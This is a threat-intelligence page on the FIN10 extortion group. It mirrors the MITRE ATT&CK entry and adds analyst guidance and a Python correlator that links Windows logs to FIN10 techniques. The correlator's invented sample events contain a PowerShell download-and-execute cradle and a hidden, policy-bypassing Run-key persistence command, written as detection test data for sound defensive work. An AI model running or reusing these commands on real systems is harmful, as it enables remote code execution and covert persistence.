MITRE ATT&CK® Group

G0051: FIN10

FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. [1]

Domain: Enterprise. Object: G0051 (Group), object version 1.3.

Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

FIN10 matters because ATT&CK describes it as a financially motivated group that used stolen, exfiltrated victim data for extortion against North American organizations during the 2013–2016 period. For leaders, the decision value is less about a current campaign claim and more about validating whether the organization can detect and respond to credential abuse, remote access, lateral movement, persistence, and data-theft-driven extortion behaviors.

Executive priority

Treat this as a readiness lens for data extortion risk. Executives should ask whether identity controls, RDP governance, endpoint logging, incident response playbooks, and evidence needed for legal/compliance decisions are strong enough to support rapid containment and fact-finding if stolen-data extortion is alleged. Budget and control priorities should focus on account abuse, remote access paths, Windows execution and persistence mechanisms, and defensible investigation evidence.

Technical view

ATT&CK provides no group-specific detection text and no platforms for FIN10, so SOC validation should be driven by the techniques ATT&CK relates to the group: Empire use; RDP (T1021.001); system owner/user discovery (T1033); scheduled tasks (T1053.005); PowerShell (T1059.001) and Windows command shell (T1059.003) execution; file deletion (T1070.004); valid account (T1078) and local account (T1078.003) abuse; Registry Run keys / Startup Folder persistence (T1547.001); lateral tool transfer (T1570); and acquisition of publicly available tools (T1588.002). The strongest defensive validation is whether teams can correlate identity logons, remote desktop activity, process and script execution, persistence changes, file movement, and cleanup activity into a single intrusion timeline.

Likely telemetry

  • Authentication and account-use logs, including local account activity where applicable
  • Remote Desktop Protocol session and logon records on Windows systems
  • PowerShell execution and script logging where enabled
  • Windows command shell process creation and command-line telemetry
  • Scheduled task creation, modification, and execution events

Detection direction

  • Do not rely on a FIN10-specific signature; ATT&CK does not provide detection guidance for this group object.
  • Validate correlation across valid-account logons, RDP sessions, command execution, and persistence changes, since these behaviors can appear administrative in isolation.
  • Tune detections for PowerShell, cmd.exe, scheduled tasks, registry startup changes, and file deletion with attention to administrator false positives.
  • Review whether local accounts and reused administrative credentials are visible in logs; these are common blind spots for Valid Accounts and Local Accounts coverage.
  • Test whether lateral tool transfer between internal systems is observable, not just initial ingress or internet-facing activity.
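As an added illustration of the correlation the Technical view and Detection direction sections call for (this is not code from the page, from MITRE, or from the FireEye report): a small Python correlator that maps constructed Windows Security, PowerShell Operational and Sysmon events to the FIN10 technique IDs in the relationship table below, then flags a host only when several distinct techniques cluster inside one time window. The event dictionaries are a simplified, invented shape rather than any SIEM's native schema, and every hostname, user, path and IP address in the sample is made up.

```python
"""Correlate FIN10-style (ATT&CK G0051) behaviours across Windows telemetry.

Added example, not from ATT&CK or the FireEye report. Event shapes are a
simplified, constructed subset of Windows Security, PowerShell Operational
and Sysmon fields; the sample events below are invented for this demo.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set

RUN_KEY = "\\currentversion\\run\\"

# Constructed sample telemetry. WS01 shows the full chain the page describes;
# SRV02 shows routine domain-admin RDP + PowerShell + scheduled task, which
# should not fire on its own.
EVENTS: List[Dict] = [
    {"ts": "2024-03-01T02:05:10", "host": "WS01", "channel": "Security", "id": 4624,
     "logon_type": 10, "user": "Administrator", "domain": "WS01", "src_ip": "10.0.5.23"},
    {"ts": "2024-03-01T02:07:42", "host": "WS01", "channel": "Security", "id": 4688,
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c C:\\Users\\Public\\update.bat"},
    {"ts": "2024-03-01T02:07:43", "host": "WS01", "channel": "PowerShell", "id": 4104,
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://10.0.5.23/launcher')"},
    {"ts": "2024-03-01T02:09:00", "host": "WS01", "channel": "Security", "id": 4698,
     "task_name": "\\Updater", "user": "Administrator"},
    {"ts": "2024-03-01T02:09:05", "host": "WS01", "channel": "Sysmon", "id": 13,
     "target_object": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "details": "powershell.exe -w hidden -ep bypass -File C:\\Users\\Public\\u.ps1"},
    {"ts": "2024-03-01T02:40:00", "host": "WS01", "channel": "Sysmon", "id": 23,
     "target_filename": "C:\\Users\\Public\\update.bat"},
    {"ts": "2024-03-01T09:00:00", "host": "SRV02", "channel": "Security", "id": 4624,
     "logon_type": 10, "user": "jsmith", "domain": "CORP", "src_ip": "10.0.1.10"},
    {"ts": "2024-03-01T09:03:00", "host": "SRV02", "channel": "PowerShell", "id": 4104,
     "script": "Get-Service | Where-Object Status -eq Stopped"},
    {"ts": "2024-03-01T09:05:00", "host": "SRV02", "channel": "Security", "id": 4698,
     "task_name": "\\Backup", "user": "jsmith"},
]


def classify(ev: Dict) -> Set[str]:
    """Map one event to the ATT&CK technique(s) it is evidence for.

    One event can support two techniques: an RDP logon with a local account
    is both T1021.001 and T1078.003, which is exactly the FIN10 pattern.
    """
    hits: Set[str] = set()
    ch, eid = ev["channel"], ev["id"]
    if ch == "Security" and eid == 4624:
        if ev.get("logon_type") == 10:                           # RemoteInteractive = RDP
            hits.add("T1021.001")
        if ev.get("domain", "").upper() == ev["host"].upper():   # local, not domain, account
            hits.add("T1078.003")
    elif ch == "Security" and eid == 4688:
        image, cmd = ev.get("image", "").lower(), ev.get("cmdline", "").lower()
        if image.endswith("\\cmd.exe") and ".bat" in cmd:
            hits.add("T1059.003")                                # cmd.exe running a batch file
    elif ch == "PowerShell" and eid == 4104:
        hits.add("T1059.001")                                    # script block logged
    elif ch == "Security" and eid == 4698:
        hits.add("T1053.005")                                    # scheduled task created
    elif ch == "Sysmon" and eid == 13 and RUN_KEY in ev.get("target_object", "").lower():
        hits.add("T1547.001")                                    # Run key value written
    elif ch == "Sysmon" and eid == 23:
        hits.add("T1070.004")                                    # file deleted
    return hits


def find_chains(events: List[Dict], window: timedelta = timedelta(hours=1),
                min_techniques: int = 4) -> List[Dict]:
    """Per host, report the first window that covers >= min_techniques distinct
    techniques. Persistence plus cleanup in the same window is escalated,
    because that pairing is rarely routine administration."""
    by_host: Dict[str, List] = defaultdict(list)
    for ev in events:
        techs = classify(ev)
        if techs:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), techs))
    findings = []
    for host, items in by_host.items():
        items.sort(key=lambda t: t[0])
        for i, (start, _) in enumerate(items):
            in_window = [it for it in items[i:] if it[0] - start <= window]
            techs = set().union(*(t for _, t in in_window))
            if len(techs) < min_techniques:
                continue
            persistence = bool(techs & {"T1053.005", "T1547.001"})
            findings.append({
                "host": host,
                "start": start.isoformat(),
                "end": in_window[-1][0].isoformat(),
                "techniques": sorted(techs),
                "severity": "high" if persistence and "T1070.004" in techs else "medium",
                "timeline": [(ts.strftime("%H:%M:%S"), sorted(t)) for ts, t in in_window],
            })
            break  # one finding per host is enough for triage
    return findings


if __name__ == "__main__":
    for f in find_chains(EVENTS):
        print(f["host"], f["severity"], f["start"], "->", f["end"])
        for ts, techs in f["timeline"]:
            print("  ", ts, ", ".join(techs))
```

Run it directly to print the per-host timeline. WS01 fires at high severity because a local Administrator RDP logon, a .bat launched through cmd.exe, a PowerShell script block, a scheduled task, a Run key write and the deletion of the batch file all land within an hour; SRV02, a domain account doing RDP, PowerShell and a scheduled task, stays below the threshold, which is the administrative false-positive point made in the list above. The window and the technique threshold are the knobs to tune against your own administrative baseline.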

Mitigation priorities

  • Prioritize governance and monitoring of valid accounts, local accounts, and remote access paths such as RDP.
  • Reduce unnecessary exposure and use of remote desktop and administrative access mechanisms.
  • Harden and monitor Windows persistence locations including scheduled tasks, Run Keys, and Startup Folders.
  • Improve endpoint visibility for PowerShell, Windows command shell, file movement, and file deletion activity.
  • Maintain incident response procedures for data-theft extortion scenarios, including evidence preservation and executive/legal escalation paths.

Analyst notes and limits

The supplied ATT&CK object identifies FIN10 as financially motivated and tied to data extortion, with a cited FireEye report as the primary external reference. The relationship set is useful for defensive planning because it shows the behaviors ATT&CK associates with the group, especially credential abuse, RDP, Windows execution, persistence, lateral movement, and tool use.

ATT&CK provides no official detection text, no group-level platforms or tactics, and the description covers activity since at least 2013 through 2016. This summary does not claim current activity, customer exposure, or guaranteed detection. Local telemetry, architecture, and incident evidence are required to determine actual risk and coverage.

Official MITRE ATT&CK definition

FIN10

FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. [1]

The same entry is available on attack.mitre.org (MITRE-hosted reference); in-page links above use the Glexia ATT&CK library.

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

11 rows. Columns: Domain, ID, Name, Relationship / procedure. All rows are in the Enterprise domain; entries marked (sub-technique) are sub-techniques.

T1070.004  File Deletion (sub-technique)
  FIN10 has used batch scripts and scheduled tasks to delete critical system files.[1]

T1570  Lateral Tool Transfer
  FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.[1]

T1033  System Owner/User Discovery
  FIN10 has used Meterpreter to enumerate users on remote systems.[1]

T1059.003  Windows Command Shell (sub-technique)
  FIN10 has executed malicious .bat files containing PowerShell commands.[1]

T1078.003  Local Accounts (sub-technique)
  FIN10 has moved laterally using the Local Administrator account.[1]

T1547.001  Registry Run Keys / Startup Folder (sub-technique)
  FIN10 has established persistence by using the Registry option in PowerShell Empire to add a Run key.[1] (Citation: Github PowerShell Empire)

T1053.005  Scheduled Task (sub-technique)
  FIN10 has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.[1] (Citation: Github PowerShell Empire)

T1588.002  Tool (sub-technique)
  FIN10 has relied on publicly-available software to gain footholds and establish persistence in victim environments.[1]

T1021.001  Remote Desktop Protocol (sub-technique)
  FIN10 has used RDP to move laterally to systems in the victim environment.[1]

T1059.001  PowerShell (sub-technique)
  FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence.[1] (Citation: Github PowerShell Empire)

T1078  Valid Accounts
  FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor.[1]

Associated objects

Groups, software, and campaigns

Tool (Enterprise): S0363: Empire

Empire is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]

Platforms: Linux, macOS, Windows

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release: 19.1
Object version: 1.3
Created / Modified: timestamps not present in this snapshot
Raw hash: f4f65bf9578ee255...

Imported snapshots across ATT&CK releases (1):
  Release 19.1, object version 1.3, status: current bundle, raw hash f4f65bf9578e… (bundle import date and modified timestamp not present in this snapshot)
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. FireEye FIN10 June 2017: FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved November 17, 2024.
  2. FIN10 (alias record; citation: FireEye FIN10 June 2017).
  3. mitre-attack G0051 (MITRE ATT&CK group object).

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.